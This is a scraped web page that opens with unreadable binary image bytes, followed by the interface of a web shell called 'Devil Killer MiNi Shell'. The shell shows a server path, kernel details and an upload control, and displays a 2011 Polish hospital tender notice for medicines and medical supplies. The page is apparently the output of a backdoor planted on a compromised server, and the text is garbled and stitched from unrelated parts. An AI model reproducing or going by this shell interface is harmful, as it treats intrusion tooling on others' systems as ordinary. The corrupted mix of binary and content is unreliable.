JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111017/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111017/271553-N-2011.html

<p class="kh_header"><b>Krasnystaw: PN 13/2011 Zakup,  dostawa leków i wyrobów medycznych do Samodzielnego Publicznego Zespołu Opieki Zdrowotnej w Krasnymstawie</b><br>
<b>Numer ogłoszenia: 271553 - 2011; data zamieszczenia: 17.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Opieki Zdrowotnej w Krasnymstawie , ul. M. Sobieskiego 4B, 22-300 Krasnystaw, woj. lubelskie, tel. 082 5762170, faks 082 5764901.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzozkrasnystaw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samodzielny Publiczny Zespół Opieki Zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PN 13/2011 Zakup,  dostawa leków i wyrobów medycznych do Samodzielnego Publicznego Zespołu Opieki Zdrowotnej w Krasnymstawie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest zakup leków i wyrobów medycznych do SPZOZ w Krasnymstawie podzielony na 6 pakietów wraz z dostawą do Apteki Szpitalnej lub Apteki PRIMA - działów (komórek organizacyjnych)  Samodzielnego Publicznego Zespołu Opieki Zdrowotnej w Krasnymstawie.  
2. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 2 do siwz. Podane ilości  są szacunkowym zapotrzebowaniem na okres 12 miesięcy
3. Zamawiający zastrzega sobie prawo do zakupu ilości określonego towaru stosownie do bieżących potrzeb i zapłaty do wysokości dokonanych zakupów.
4. Wymagany termin ważności oferowanego produktu wynosi, co najmniej 12 miesięcy od dnia ich dostawy.
5. Przez leki stanowiące przedmiot zamówienia należy rozumieć produkty lecznicze 
w rozumieniu ustawy prawo farmaceutyczne z dnia 6 września 2001 roku (Dz. U. z 2008 r. Nr 45 poz. 271).
6. Leki muszą być dopuszczone do obrotu na zasadach określonych w art. 3 i 4a ustawy prawo farmaceutyczne z dnia 6 września 2001 roku (Dz. U. z 2008 r. Nr 45 poz. 271). 
7. Wyroby medyczne muszą być dopuszczone do stosowania na zasadach określonych w ustawie o  wyrobach medycznych z 20.05.2010 r. (Dz. U. Nr 107 poz. 679).
8. UWAGA ! - W związku z nieustannie zmieniającą się sytuacją na rynku produktów farmaceutycznych, zamawiający zwraca się do wykonawców z prośbą, aby - niezwłocznie po zapoznaniu się z zapisami siwz - informowali zamawiającego o ewentualnych przypadkach braku danych asortymentów na rynku (z przyczyn obiektywnych, np. wycofanie z obrotu, wstrzymanie produkcji itp.). W takich przypadkach asortymenty te będą wyłączone, w celu umożliwienia wykonawcom złożenia oferty i umożliwienia zamawiającemu dokonania późniejszej oceny ofert. O wyłączeniu danego asortymentu zamawiający niezwłocznie powiadomi wykonawców.
9. Zamawiający żąda od wykonawców aby wskazali te części zamówienia, których realizację zamierzają powierzyć podwykonawcom. Za czynności dokonywane przez podwykonawcę odpowiada wykonawca.
10. Zamawiający nie zamierza zwoływać zebrania wykonawców.
11. Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6, 33.14.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Przed upływem terminu składania ofert, wykonawca zobowiązany jest wnieść wadium. Wadium dla całego zamówienia wynosi: 6 600,00 zł (słownie: sześć tysięcy sześćset złotych), w tym dla poszczególnych części:
Pakiet 6	200,00 zł
Pakiet 10	500,00 zł
Pakiet 41	400,00 zł
Pakiet 48    500,00 zł
Pakiet 54    5 000,00 zł
Pakiet 55    Bez wadium
W przypadku złożenia oferty częściowej wykonawca zobowiązany jest wnieść wadium w kwocie określonej dla danej części. W przypadku złożenia oferty na kilka części kwota wadium stanowi sumę wadiów ustalonych dla poszczególnych części zamówienia. Jeżeli wysokość wniesionego wadium będzie niższa niż suma wynikająca z poszczególnych części zamówienia, zamawiający uzna, że wadium nie zostało wniesione w wymaganej wysokości.
2. Wadium może być wnoszone w jednej lub kilku następujących formach:
2.1 pieniądzu,
2.2 poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
2.3 gwarancjach bankowych,
2.4 gwarancjach ubezpieczeniowych, 
2.5 poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.).
3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy zamawiającego nr 35 1500 1373 1213 7001 1394 0000 prowadzony w Kredyt Bank S.A. z siedzibą w Warszawie, Oddział w Chełmie, Filia nr 5 w Krasnymstawie, 22-300 Krasnystaw, ul. Matysiaka 7 na przelewie należy umieścić informację Wadium PN 13 2011 Zakup, dostawa leków i wyrobów medycznych do Samodzielnego Publicznego Zespołu Opieki Zdrowotnej w Krasnymstawie
4. Wykonawca powinien złożyć w ofercie dowód wniesienia wadium w przypadku wpłaty przelewem. Terminem wniesienia wadium jest data i czas uznania rachunku zamawiającego.
5. W przypadku wniesienia wadium w formach innych niż pieniądzu wykonawca zobowiązany jest dołączyć do oferty gwarancję bądź poręczenie w następujący sposób: kserokopię potwierdzoną za zgodność z oryginałem zszyć, zbindować lub w inny sposób trwale złączyć z ofertą, natomiast oryginał dokumentu należy złożyć wraz z ofertą w taki sposób, aby była możliwość jego zwrócenia bez dekompletowania oferty. W przypadku, gdy oryginał dokumentu będzie zszyty, zbindowany lub w inny sposób trwale złączony z ofertą zamawiający nie dokona jego zwrotu. 
6. Wadium wnoszone w formie gwarancji i poręczeń musi spełniać następujące wymogi:
6.1 być wystawione na Samodzielny Publiczny Zespół Opieki Zdrowotnej w Krasnymstawie, ul. M. Sobieskiego 4 B, 22-300 Krasnystaw,
6.2 zawierać w swej treści oświadczenie gwaranta (poręczyciela), w którym zobowiązuje się on do bezwarunkowej wypłaty kwoty wadium na pierwsze żądanie zamawiającego zawierające oświadczenie, iż zaszła jedna z przesłanek wymienionych w art. 46 ust. 5 ustawy,
6.3 w przypadku, gdy wykonawcy wspólnie ubiegają się o udzielenie zamówienia - obejmować zobowiązanie gwaranta (poręczyciela) z tytułu związanych z postępowaniem o udzielenie zamówienia działań lub zaniechań opisanych w art. 46 ust. 5 ustawy każdego z tych wykonawców,
6.4 okres ważności wadium nie może być krótszy niż okres związania ofertą, przy czym pierwszym dniem ważności zobowiązania jest dzień składania ofert.
7. Zamawiający zwróci wadium na zasadach określonych w art. 46 ustawy Prawo zamówień publicznych. W przypadku wniesienia wadium w pieniądzu, w ofercie należy podać nazwę, adres banku oraz numer konta, na jakie zamawiający dokonuje zwrotu wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się wykonawcy: 1) Którzy spełniają warunki o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych, dotyczące: a. posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania; b. posiadania wiedzy i doświadczenia; c. dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia; d. sytuacji ekonomicznej i finansowej. 2) Wykonawcy w stosunku do których brak podstaw do wykluczenia z powodu niespełniania warunków, o których mowa w art. 24 ust. 1 ustawy. 3) Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na podstawie treści złożonych oświadczeń lub dokumentów: a. OŚWIADCZENIA O SPEŁNIANIU WARUNKÓW UDZIAŁU W POSTĘPOWANIU ZGODNIE Z ART. 44 USTAWY, b. oświadczenia o braku podstaw do wykluczenia wykonawcy na podstawie art. 24 ust. 1 ustawy, c. treści złożonych dokumentów, których zamawiający wymaga w celu potwierdzenia spełniania warunków udziału w postępowaniu oraz dokumentów wymaganych w celu wykazania braku podstaw do wykluczenia z postępowania. Zamawiający dokonując oceny spełniania warunków udziału w postępowaniu przez wykonawcę będzie stosował formułę spełnia/nie spełnia. Jeżeli treść złożonych oświadczeń lub treść złożonych dokumentów potwierdzi, że wykonawca spełnia warunki udziału w postępowaniu i nie ma podstaw do jego wykluczenia to - zamawiający odnotuje, że wykonawca - warunki spełnia. W przypadku gdy treść złożonych oświadczeń lub treść złożonych dokumentów nie potwierdzi, że wykonawca spełnia warunki udziału w postępowaniu lub są podstawy do jego wykluczenia to zamawiający odnotuje, że wykonawca - warunków nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenie dokumentów potwierdzających, że dostawy te zostały wykonane należycie w zakresie jak wyżej, o wartości na potwierdzenie spełniania warunków posiadania wiedzy i doświadczenia. Uwaga: Załącznik nr 4 określa przykładowy wzór wykazu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Aktualne koncesje, zezwolenia lub licencje zgodnie z przedmiotem zamówienia na obrót, jeżeli przepisy wymagają posiadania takich uprawnień. W przypadku obrotu produktami leczniczymi, należy przedstawić jeden z dokumentów: 1.1 zezwolenie Głównego Inspektora Farmaceutycznego (GIF) w zakresie prowadzenia hurtowni farmaceutycznej, a w przypadku składania oferty na leki psychotropowe i środki odurzające - odpowiednio wymagane zezwolenie. 1.2 zezwolenie Głównego Inspektora Farmaceutycznego na wytwarzanie, jeżeli wykonawca jest wytwórcą. 1.3 w przypadku wykonawcy prowadzącego skład konsygnacyjny - zezwolenie na prowadzenie składu zawierające uprawnienia przyznane przez GIF w zakresie obrotu produktami leczniczymi. 2. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Przed podpisaniem umowy wykonawca który jest osobą fizyczną prowadzącą działalność gospodarczą, jak również wykonawcy prowadzący wspólnie działalność na podstawie umowy spółki cywilnej zobowiązani są do przedstawienia aktualnych zaświadczeń o wpisie do ewidencji działalności gospodarczej oraz umowę spółki. 3. Oświadczenie wykonawcy o braku podstaw do wykluczenia według wzoru stanowiący - załącznik nr 3 do specyfikacji. 4. Oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu zgodnie z art. 44 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych. 5. Zaakceptowany i podpisany projekt umowy sprzedaży w zależności od pakietu / pakietów na który składana jest oferta: - załącznik nr 5 w przypadku składania oferty na pakiet nr 6, 10, 41, 48 - załącznik nr 6 w przypadku składania oferty na pakiet nr 54÷55 6. Dokumenty potwierdzające spełnianie warunków udziału w postępowaniu wykonawców mających siedzibę lub miejsce zamieszkania za granicą, zgodnie z siwz.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wypełniony i podpisany przez osoby upoważnione do reprezentowania wykonawcy formularz oferty, sporządzony według wzoru stanowiący - załącznik nr 1 do specyfikacji istotnych warunków zamówienia. 2. Pełnomocnictwo - do reprezentowania wykonawcy w postępowaniu albo do reprezentowania wykonawcy w postępowaniu i zawarcia umowy, jeżeli osoba reprezentująca wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana jako upoważniona do jego reprezentacji we właściwym rejestrze lub ewidencji działalności gospodarczej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Dokument potwierdzający wniesienie wadium. W przypadku wniesienia wadium w formie gwarancji, do oferty należy dołączyć poświadczoną za zgodność z oryginałem kserokopię a oryginał dostarczyć w osobnej kopercie. 2. Wypełniony i podpisany przez osoby upoważnione do reprezentowania wykonawcy formularz cenowy, sporządzony według wzoru stanowiący - załącznik nr 2 do specyfikacji. 3. Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 4. Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 5. Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spzozkrasnystaw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zespół Opieki Zdrowotnej w Krasnymstawie, ul. M. Sobieskiego 4 B, 22-300 Krasnystaw w Dziale Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.10.2011 godzina 10:00, miejsce: Kancelaria Samodzielnego Publicznego Zespołu Opieki Zdrowotnej w Krasnymstawie, ul. M. Sobieskiego 4 B, 22-300 Krasnystaw - pok. nr 4..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PAKIET NR 6 Wadium 200,00 PLN.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p	Nazwa leku	JM	Ilość
1	BISACODYLUM CZOPKI 0,01 G x 5	OPAKOWANIE	400
2	PHENYLBUTAZONUM CZOPKI 0,25 G x 5	OPAKOWANIE	5
